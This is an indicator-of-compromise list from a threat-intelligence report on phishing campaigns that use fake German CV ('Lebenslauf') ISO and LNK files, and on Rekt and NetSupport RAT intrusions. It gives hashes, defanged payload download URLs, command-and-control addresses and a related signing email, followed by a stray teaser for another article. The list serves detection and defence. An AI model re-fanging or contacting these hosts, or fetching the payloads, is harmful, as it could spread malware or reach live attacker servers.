lebenslauf_2020_1_7.jpeg.lnk:
3c2efe675c184a63bac6d427923942098e87ae0861c9515397190546b4f91366
Uri:hxxp://185.244.150[.]153/rar.exe
Uri:hxxp://185.244.150[.]153/zit.rar
Zit.rar:7c7f00b85119f8b5cde59ce2b566450723d6f990583c820b6417a6fd86a85dae
C2:hxxp://185.244.150[.]153/firstga990.php

Campaign 3
Eml:652711a83d3b558b6d258e7f93b6a9013c73236a193b6e7b2dbf8aa0054151ab
Eml:8b325b8755e9238a029bff55faf9ff2c88ab5d9c89619f2f2095030418cfa4fc
Lebenslauf_2019_11_20.iso:
2662843a571ee279313ca6d858486e3963a37d41580fe410fd06b4979dc5cbaf
cb4f25c610205ffce4d191f07ffc003272a6d82441c6eedf7f4ca6ff0d4f0828
lebenslauf_2019_11_20.jpeg.lnk:
76640f5b3b211c83992ab13c2e07891d114f81b6e24a55254ae0b6ba17a868be
hxxp://185.183.96[.]54/rar.exe
hxxp://185.183.96[.]54/htn.rar
htn.rar:88f6b490c212c836277d49164f6358587a72148a29c3c2cd20d623b00842f3de
URI:hxxp://185.183.96[.]54/firstga990.php

Campaign 4
Lebenslauf_2019_10_6.iso:
96dd2b60236ef7b0c9947e24b74797b4ccaf3f5dc6e07997caa72e21c8cd70cc
lebenslauf_2019_10_6.jpeg.lnk:
398e4653969a829d68a52159919cbd3e4b277e65cc7cb55e439e27cd8a3e9651
Uri:hxxp://185.141.27.172/rar.exe
Uri:hxxp://185.141.27.172/zirr.rar

Campaign 5
eml:80c0c506219df033cff002f4affa858a386ef1ba7840de15f2d909fc4530dce9
lebenslauf_2019_9_6.iso
f35bef883bdc36d54c987643eb9220e10245f81fcfde6e12870c2a580f6f83cc
lebenslauf_2019_9_6.img.lnk
36060b9bf31679e202dba410765ef0865b4af31e9885abe315f9c3d8c4f099f8
Uri:hxxp://185.141.27.250/rar.exe
Uri:hxxp://185.141.27.250/tripok.rar
tripok.rar
35bcd0dff8a01b1065ca0a5de7eb3e53eb10ec1569489c89cd1008a176780fb3
tripok.bat
7ce83fa4ede857ea60877effea3271224a6f6a59c2dfdfddd4feb383c4f39375 

Campaign 6
lebenslauf_2019_8_6.iso
a58c7f2ed08c8a1eac0a3aac50a0887bfdea69a7af83390fc5586dd75b42d022
lebenslauf_2019_8_6.img.lnk
848a669d612185bbcbff5392f41a0d2e4ddad8cc5c276ec313216f1724a153fa
URI:hxxp://185.82.202.66/rar.exe
Uri:hxxp://185.82.202.66/pork.rar

Campaign 7
Eml:445459f98d6c032ff3cdea3d8fb78d8d93f0cdd9d0d2d7a8653b2f953e4238d2
lebenslauf_2019_7_6.iso:
2a3ee52a465fa25bef9d2a96b1bb04eae31b6637b59ee1b9e2d69683b57b6888
Lebenslauf_2019_7_6.img.lnk:
E578ea331ff0ef23ea6334eb52f0fc110e6a5e11490e36d2e23c8b8cbde835e5
URI:hxxp://185.82.202[.]66/rar.exe
Uri:hxxp://185.82.202[.]66/zuoom.rar
Zuoom.rar:abc2d96986db822ff4d002cfde0adf772c9f72b611145a3345203c35f50a8b32
Zuoom.rar:c2b12300a6a01c2db44797b1e10a7735ca7d472b404a5beb393e66cdb129f179

Ransomware Strain
Campaign 8
Lebenslauf_2019_6_6.iso
E87e1b21fd2a93d96cc68f4ff8947836fa55dbd1e0d0e9f109efd7a0f42d3315
Fdb8c48d05285a49d77f5b9b123775fa8cf4307430d89087608736cb1181c727
7a83adfeccb1d8a07fe94f71fa347f068a80e8f4f4785a7d7cc1817b533c79e4
lebenslauf_2019_6_6.img.lnk
4508ce47e81cd01209afee9458c4e0e5071956cbee373138bb9678a25fadca15
5af03a143f4df5668414294a1aeb2eb9a5c4b6a391985d8611c4a809b1a7a737
D8389e061761d5de128b09e80cf1bf47efde21ca0bf07c038d802bb19b8fde98
Dedec7689f5cdc0931da2e9e6ab68e4843fe5ad0bb0699c771ce0a20ee954af5
f767f8bb1d1fe9b18e4b4f8d07b36d026a07db8f872cded59a5f7f6bc858c67d
URI:hxxp://185.106.120.31/rar.exe
URI:hxxp://185.106.120.31/trg.rar
trg.rar:19d3ca02ad8df7cffa65517ce95d52badeffed18dc35cc8db3351f583f1f3711
Lebenslauf_2019_6_6.jpe:
Dad4776d9458167fb081256b90273df5ac24ff6a99fb51718b08e6faba1b0691
brk.bat
3e7edc842702b6df90a3e86be2775b75574f3122e4d52a86fc6fd9da68b73f67
brtopi.bat
d6c4a85ea9e59bfd68d9041d8ea380dce210e7e45dd57f8da23199925c0123f6
URI:hxxp://185.106.120[.]31/ok

Campaign 9
eml:7c0aeaf5da11402b35ddb09d123c780f7b371f84720dfc6d28b1d80c62c427ce
lebenslauf_2019_5_6.iso
E72a7d2e17beb1dba799ad9891778f5ce0b2207978bc658d3826c041f5f0736c
lebenslauf_2019_5_6.img.lnk
442b37562aea6bebdce1be6b53ed7916e18f4b91b28b092a60acbeb1c46acab7
URI:hxxp://185.183.96[.]23/rar.exe
URI:hxxp://185.183.96[.]23/tog.rar
tog.rar:7bbb458e6579df29118174eb65579f6f02773e8ead9e89b65933191796774617
Trkop.vbs: 101f060edf89f4362ee6657acc110f88d3140090fb676620049a2407b503b837  yin1abtn.cq124aqq:cca91cc9bcf32f8bd9e2dddd0c001b4b4c4a83b812d4b30512fcb40f09b07403 
zapa.bat:7ce948f3b772b1829bf86cde37fa2f52916c5b1b5065b5207f7e1c2a423dd24e 

Rekt and NetSupport
January Campaign
ITW URL:hxxp://194.36.189[.]215/fnb.111
File name:fnb.111
sha256:C7d2abc2ff54556bec383afb05c5ae804d07a1fa171ea185c447d9f1e6a79746

Contacted URLs
hxxp://drive[.]google[.]com/uc?export=download&id=1SKyvgaq6-2z3ZqSJo2X-cAOvCBgl7VG-
hxxp://drive[.]google[.]com/uc?export=download&id=1w2zwPJGol7ucon-MMwrEj_CEH4B1_B8a
hxxp://drive[.]google[.]com/uc?export=download&id=11B6BFzAONrCIAZ2C8LKwR4aY34ZUpcqk

(The order of the hashes corresponds to the order URLs listed above)
NetSupport Zipped file: 4804edbbb8275cd465d7c1c520f97a1a5007f6234d4562a3ae9ed01110b429ce
Bat file:0cbaf48d543d06c838ad30e28b7cf92732a93e0507d3f3af4a7ab934890fe2fe
7z.exe (benign):c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

NetSupport Remote Administrative tool (abused binary)
e102806a9a136143e6ddead6bed5214ab4b71026c9a4eb26cc4b973f471b6c12
client32.ini:cb7e66d9eca17ce66c9241da97b85afaec01305820d86b1cd1528d4f6d72c966
C2:23.227.207[.]138:12233/fakeurl.htm 

February Campaign
ITW URL:hxxp://185.244.150[.]143/rrr.zzz
File name:rrr.zzz
sha256:df548114eb5b7a56c489f5239f66e0990e1ecacd20bcfff1b2bd677267362ad8

Contacted URLs
hxxp://drive[.]google[.]com/uc?export=download&id=1r_tfc9z3CLhC_R-x8xkw1hP4xHrAX6XE
hxxp://drive[.]google[.]com/uc?export=download&id=1oRpHhSrNdAJHO8rrSSEFFxlh4FP2LURp
hxxp://drive[.]google[.]com/uc?export=download&id=1YBCfBx7kxmT5bTMl8UgdsP9rm001OAp6

(The order of the hashes corresponds to the order URLs listed above)
Bat file:30bcc93e492c88032dd058c413e49c6cffa446f13d0311d5fb8980dbd923746b
NetSupport Zipped file: 0cbaf48d543d06c838ad30e28b7cf92732a93e0507d3f3af4a7ab934890fe2fe
7z.exe (benign):c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

NetSupport Remote Administrative tool (abused binary)
e102806a9a136143e6ddead6bed5214ab4b71026c9a4eb26cc4b973f471b6c12
client32.ini:cb7e66d9eca17ce66c9241da97b85afaec01305820d86b1cd1528d4f6d72c966
C2:23.227.207[.]138:12233/fakeurl.htm 

2019 Rekt Sample
itw:hxxp://juristlex.com/photo/photo88326635.scr
File name:photo88326635.scr
Sha256:d6c3f4b9b4b68e145238741750f3d2a5fad702192a8006c7cdebbf414a3e188d
Digital Signature serial number:75 DF 42 48 6D A0 6F 02 65 BE 10 98 04 D9 FB 13
Email address associated within digital signature:vanya.tanichew{at}mail.ru

Contacted URLs
hxxp://drive[.]google[.]com/uc?export=download&id=1s7I7GKwz22a7B72HIl2g_r9CDhfoGph2
hxxp://drive[.]google[.]com/uc?export=download&id=16zuLpHLv0nU3sCmFlz-4UfOS5bOw7P-k
hxxp://drive[.]google[.]com/uc?export=download&id=1IX7ox1rdGp53hGlWxgaYyh1fwhk8_SGr

Flawwed Ammy samples that shared the digital certificate properties
sha256:7ecfd68341fe276c17246dc51c5d70ee2c1bbc6801c85201c8a62956c23d872d
Sha256:56b57fc829774aa4423b7a29ff5a081b75167d2466898acbc7d89e717bfb4869
Digital Signature Serial number:00 F4 24 13 EE 41 08 72 60 A5 07 6D DA F1 C0 76 C5


Phantom in the Command Shell

Author:  Danny Adamitis   Executive Summary Prevailion’s Tailored Intelligence Team has detected two new criminal campaigns targetin...